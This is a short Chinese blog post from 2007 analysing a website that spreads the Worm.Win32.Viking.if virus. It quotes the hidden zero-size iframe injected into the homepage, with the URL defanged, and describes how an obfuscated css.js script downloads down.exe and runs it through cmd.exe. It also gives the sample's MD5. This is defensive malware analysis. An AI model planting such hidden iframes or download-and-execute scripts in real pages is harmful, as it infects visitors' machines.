发现一个传播威金/Worm.Win32.Viking.if的网站，用的技术很新颖

endurer 原创

2007-03-07 第1版

该网站首页包含代码：

＜iframe src=hxxp://www***1.8***93**8*2.cn/5***1**.htm width=0 height=0＞

hxxp://www***1.8***93**8*2.cn/5***1**.htm 包含代码：
/---
＜script src=css.js＞＜/script＞
---/

hxxp://www***1.8***93**8*2.cn/css.js 的内容为JavaScript程序，使用正则表达式解密代码并运行。

解密出来的代码采用JavaScript编写，功能是利用 Microsoft.XMLHTTP 和
scrīpting.FileSystemObject 下载文件 down.exe，保存为 %windir%/~tmp.tmp，并利用Shell.Application 对象Q 的 ShellExecute 方法 执行命令： %windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。

/---
文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-7 20:22:38
修改时间 : 2007-3-7 20:23:51
访问时间 : 2007-3-7 20:25:16
大小 : 65427 字节 63.915 KB
MD5 : f066f58f878be37bcc53a096d61d05e8
---/

kaspersky 报为 Worm.Win32.Viking.if。

后记：
这种网页代码加密技术还是第一次遇到，解密这段代码费了一会功夫。
调用cmd.exe来运行，也很新颖。